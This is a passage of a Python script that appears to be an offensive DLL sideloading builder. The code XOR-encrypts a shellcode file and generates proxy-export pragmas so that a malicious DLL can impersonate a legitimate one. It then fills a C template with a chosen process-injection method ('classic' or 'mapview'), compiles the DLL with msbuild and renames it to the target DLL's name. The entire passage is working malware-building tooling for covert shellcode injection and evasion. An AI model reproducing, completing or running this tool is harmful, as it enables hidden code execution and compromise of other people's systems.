331 | # If our DLL is in a local directory let's make a copy and proxy to it
332 | else:
333 | pe = pefile.PE(targetDLL)
334 | dll = targetDLL.strip(".dll") + "_origin"
335 | os.system(f"copy {targetDLL} Output/{dll}.dll")
336 | d = [pefile.DIRECTORY_ENTRY["IMAGE_DIRECTORY_ENTRY_EXPORT"]]
337 | pe.parse_data_directories(directories=d)
338 | exports = [(e.ordinal, e.name.decode()) for e in pe.DIRECTORY_ENTRY_EXPORT.symbols if e.name]
339 | pragma_list = []
340 |
341 | for e in exports:
342 | pragma_list.append('#pragma comment(linker,"/export:{func}={dll}.{func},@{ord}")'.format(func=e[1], dll=dll, ord=e[0]))
343 |
344 | return pragma_list
345 |
346 |
347 | def main():
348 | global dllmain
349 | logBanner()
350 | parser = optparse.OptionParser(usage="Usage {} [-k | --key= XOR key] [-f | --file= Shellcode File] [-o | --output= output file name] [-t | --target= Target Process] [-d | --dll= DLL to proxy ] [ -m | --method= shellcode execution (Options: classic, mapview) ]".format(sys.argv[0]), version="{} 1.0".format(sys.argv[0]))
351 | parser.add_option('-k','--key=', dest='xorKey', type='string', help='Specify the KEY for XOR encryption/Decryption')
352 | parser.add_option('-f','--file=', dest='shellcodeFile', type='string', help='Specify the shellcode file')
353 | parser.add_option('-o','--output=', dest='outputFilename', type='string', help='Specify the output filename')
354 | parser.add_option('-t','--target=', dest='targetProcess', type='string', help='Specify the target process to inject the shellcode')
355 | parser.add_option('-d','--dll=', dest='targetDLL', type='string', help='Specify the DLL for sideloading')
356 | parser.add_option('-m','--method=', dest='method', type='string', help='Specify the method for shellcode execution (Options: classic, mapview)')
357 | (options, args) = parser.parse_args()
358 | if (options.xorKey == None) or (options.shellcodeFile == None) or (options.outputFilename == None) or(options.targetProcess == None) or (options.targetDLL == None):
359 | print (parser.usage)
360 | exit(0)
361 | else:
362 | xorKey = options.xorKey
363 | shellcodeFile = options.shellcodeFile
364 | outputFilename = options.outputFilename
365 | targetProcess = options.targetProcess
366 | targetDLL = options.targetDLL
367 | method = "classic" if options.method is None else options.method
368 | if method.lower() not in ["classic", "mapview"]:
369 | print(parser.usage)
370 | exit(0)
371 |
372 | print(f"[+] Encrypting the shellcode using xor with the key {xorKey}")
373 | encryptShellcode(shellcodeFile, outputFilename, xorKey)
374 |
375 | print(f"[+] Generating pragma header for proxy DLL {targetDLL}")
376 | pragma_list = '\n'.join(proxyFunctions(targetDLL))
377 |
378 | if method.lower() == "classic":
379 | dllmain = dllmain.replace(r"memcpy_placeholder", "").replace(r"technique_function_placeholder", classic_injection)
380 | elif method.lower() == "mapview":
381 | dllmain = dllmain.replace(r"memcpy_placeholder", memcopy_function).replace(r"technique_function_placeholder", mapviewsection_injection)
382 | else:
383 | print("Error occur.. try again")
384 | exit(0)
385 |
386 |
387 | print("[+] Making the dllmain file")
388 | dllmain = dllmain.replace(r"pragma_functions_placeholder", pragma_list).replace(r"xor_key_placeholder", xorKey).replace(r"shellcode_file_placeholder", outputFilename).replace(r"target_process_placeholder", targetProcess)
389 |
390 | with open("./SideLoadingDLL/SideLoadingDLL/dllmain.c", "w") as h:
391 | h.write(dllmain)
392 |
393 | print("[+] Compiling DLL")
394 | os.system('msbuild /nologo /verbosity:quiet /consoleloggerparameters:ErrorsOnly ./SideLoadingDLL/SideLoadingDLL.sln /t:Rebuild /p:Configuration=Release /p:Platform="x64"')
395 |
396 | if not os.path.exists('Output'):
397 | os.makedirs('Output')
398 | print("[+] Moving everything to Output directory")
399 | os.system(f"move .\\SideLoadingDLL\\x64\\Release\\SideLoadingDLL.dll .\\Output\\{targetDLL.split('/')[-1]} && move {outputFilename} Output/{outputFilename}")
400 |
401 | if __name__ == "__main__":
402 | main()
403 |
--------------------------------------------------------------------------------